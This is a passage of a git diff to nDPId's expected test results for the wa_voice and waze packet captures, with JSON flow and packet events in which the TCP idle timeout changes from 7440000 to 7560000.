00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1561455688445,"flow_last_seen":1561455726442,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} 00831{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1561455731665,"flow_last_seen":1561455741046,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":704,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"1.60.78.64","src_port":56328,"dst_port":64282,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1561455741430,"flow_last_seen":1561455741430,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":50191,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1561455689909,"flow_last_seen":1561455690302,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":21432,"flow_avg_l4_payload_len":428,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.51","src_port":50503,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1561455689909,"flow_last_seen":1561455690302,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":21432,"flow_avg_l4_payload_len":428,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.51","src_port":50503,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"}} 00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1561455706979,"flow_last_seen":1561455716020,"flow_idle_time":180000,"flow_min_l4_payload_len":101,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":503,"flow_avg_l4_payload_len":125,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":64716,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1561455704557,"flow_last_seen":1561455704557,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"239.255.255.250","src_port":50384,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1561455741484,"flow_last_seen":1561455742405,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"91.252.56.51","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1561455707435,"flow_last_seen":1561455707470,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":60549,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"}} -00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":263,"flow_first_seen":1561455688704,"flow_last_seen":1561455743434,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":21081,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.53","src_port":49355,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":263,"flow_first_seen":1561455688704,"flow_last_seen":1561455743434,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":21081,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.53","src_port":49355,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1561455706913,"flow_last_seen":1561455741420,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":762,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"179.60.192.48","src_port":56328,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1561455687991,"flow_last_seen":1561455688018,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":71,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":60765,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"}} 00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1561455706912,"flow_last_seen":1561455741419,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":762,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"185.60.216.51","src_port":56328,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} diff --git a/test/results/waze.pcap.out b/test/results/waze.pcap.out index c3c2faa35..4387b8960 100644 --- a/test/results/waze.pcap.out +++ b/test/results/waze.pcap.out @@ -1,231 +1,231 @@ 00455{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"waze.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00541{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"waze.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1435587866603} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"waze.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587866603,"flow_last_seen":1435587866603,"flow_idle_time":7440000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":1,"thread_ts_msec":1435587866603,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"174.37.231.81","src_port":42256,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"waze.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1435587866603,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":91,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":91,"pkt_l4_len":57,"thread_ts_msec":1435587866603,"pkt":"ABoRAAACABoRAAABCABFAABNMsFAAEAGQsYKECWdriXnUaUQFGaA18okWhY9doAYAVcoQwAAAQEICgAIazhBJdw4gAAWBXL2KZLscQ7\/r4Q3YR6R6YsREWIs0w=="} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"waze.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1435587867103,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":91,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":91,"pkt_l4_len":57,"thread_ts_msec":1435587867103,"pkt":"ABoRAAACABoRAAABCABFAABNMsJAAEAGQsUKECWdriXnUaUQFGaA18okWhY9doAYAVcoEAAAAQEICgAIa2tBJdw4gAAWBXL2KZLscQ7\/r4Q3YR6R6YsREWIs0w=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"waze.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587866603,"flow_last_seen":1435587866603,"flow_idle_time":7560000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":1,"thread_ts_msec":1435587866603,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"174.37.231.81","src_port":42256,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"waze.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1435587866603,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":91,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":91,"pkt_l4_len":57,"thread_ts_msec":1435587866603,"pkt":"ABoRAAACABoRAAABCABFAABNMsFAAEAGQsYKECWdriXnUaUQFGaA18okWhY9doAYAVcoQwAAAQEICgAIazhBJdw4gAAWBXL2KZLscQ7\/r4Q3YR6R6YsREWIs0w=="} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"waze.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1435587867103,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":91,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":91,"pkt_l4_len":57,"thread_ts_msec":1435587867103,"pkt":"ABoRAAACABoRAAABCABFAABNMsJAAEAGQsUKECWdriXnUaUQFGaA18okWhY9doAYAVcoEAAAAQEICgAIa2tBJdw4gAAWBXL2KZLscQ7\/r4Q3YR6R6YsREWIs0w=="} 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"waze.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587867443,"flow_last_seen":1435587867443,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1435587867443,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.89.75.198","src_port":46214,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"waze.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1435587867443,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1435587867443,"pkt":"ABoRAAACABoRAAABCABFAABMAABAAEARHHkKCAAByFlLxrSGAHsAOIB9GwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANk705txaHKW"} 00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"waze.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587867443,"flow_last_seen":1435587867443,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1435587867443,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.89.75.198","src_port":46214,"dst_port":123,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"waze.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1435587867753,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1435587867753,"pkt":"ABoRAAACABoRAAABCABFAABMdHBAABAR2AjIWUvGCggAAQB7tIYAOEf+HAIA7AAAAUgAAAbvyDaVGNk70ieZS5oL2TvTm3FocpbZO9ObncvLHNk705ud0JHn"} -00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"waze.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587867755,"flow_last_seen":1435587867755,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587867755,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"65.39.128.135","src_port":54915,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"waze.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1435587867755,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587867755,"pkt":"ABoRAAACABoRAAABCABFAAA8zNlAAEAGoisKCAABQSeAh9aDAFDjx6dUAAAAAKAC\/\/+uwgAAAgQFtAQCCAoACGuNAAAAAAEDAwg="} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"waze.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1435587867759,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587867759,"pkt":"ABoRAAACABoRAAABCABFAAAodHFAABAGKqhBJ4CHCggAAQBQ1oMcOFir48enVVAS\/\/8NRwAA"} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"waze.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1435587867759,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587867759,"pkt":"ABoRAAACABoRAAABCABFAAAozNpAAEAGoj4KCAABQSeAh9aDAFDjx6dVHDhYrFAQ\/\/8NSAAA"} -00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"waze.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587867755,"flow_last_seen":1435587867781,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":263,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1435587867781,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"65.39.128.135","src_port":54915,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"xtra1.gpsonextra.net","url":"xtra1.gpsonextra.net\/xtra2.bin","code":0,"content_type":"","user_agent":"Android"}} -00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"waze.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1435587868123,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":91,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":91,"pkt_l4_len":57,"thread_ts_msec":1435587868123,"pkt":"ABoRAAACABoRAAABCABFAABNMsNAAEAGQsQKECWdriXnUaUQFGaA18okWhY9doAYAVcnqgAAAQEICgAIa9FBJdw4gAAWBXL2KZLscQ7\/r4Q3YR6R6YsREWIs0w=="} -00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"waze.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587868632,"flow_last_seen":1435587868632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587868632,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45529,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"waze.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1435587868632,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587868632,"pkt":"ABoRAAACABoRAAABCABFAAA814xAAEAGPpQKCAABNubjrLHZAFCatruPAAAAAKAC\/\/+u6AAAAgQFtAQCCAoACGwDAAAAAAEDAwg="} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"waze.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1435587868633,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587868633,"pkt":"ABoRAAACABoRAAABCABFAAAodHNAABAG0cE25uOsCggAAQBQsdllSURwmra7kFAS\/\/\/ZDAAA"} -00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"waze.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587868634,"flow_last_seen":1435587868634,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587868634,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36100,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"waze.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1435587868634,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587868634,"pkt":"ABoRAAACABoRAAABCABFAAA8jYZAAEAGx0MKCAABLjOtto0EAbvOcuGFAAAAAKAC\/\/+3SQAAAgQFtAQCCAoACGwDAAAAAAEDAwg="} -00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"waze.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1435587868635,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587868635,"pkt":"ABoRAAACABoRAAABCABFAAAodHRAABAGEGouM622CggAAQG7jQQxjR56znLhhlAS\/\/87IAAA"} -00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"waze.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587868635,"flow_last_seen":1435587868635,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587868635,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"waze.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1435587868635,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587868635,"pkt":"ABoRAAACABoRAAABCABFAAA8H6lAAEAGNSEKCAABLjOtto0GAbtbbHOtAAAAAKAC\/\/+YJQAAAgQFtAQCCAoACGwEAAAAAAEDAwg="} -00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"waze.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1435587868644,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587868644,"pkt":"ABoRAAACABoRAAABCABFAAAodHVAABAGEGkuM622CggAAQG7jQakk4xSW2xzrlAS\/\/87HgAA"} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"waze.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1435587868644,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587868644,"pkt":"ABoRAAACABoRAAABCABFAAAo141AAEAGPqcKCAABNubjrLHZAFCatruQZUlEcVAQ\/\/\/ZDQAA"} -00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"waze.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1435587868645,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587868645,"pkt":"ABoRAAACABoRAAABCABFAAAojYdAAEAGx1YKCAABLjOtto0EAbvOcuGGMY0ee1AQ\/\/87IQAA"} -00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"waze.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1435587868645,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587868645,"pkt":"ABoRAAACABoRAAABCABFAAAoH6pAAEAGNTQKCAABLjOtto0GAbtbbHOupJOMU1AQ\/\/87HwAA"} -00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"waze.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587868632,"flow_last_seen":1435587868906,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":83,"flow_tot_l4_payload_len":83,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1435587868906,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45529,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"roadshields.waze.com","url":"roadshields.waze.com\/images\/HD\/CH2.png","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} 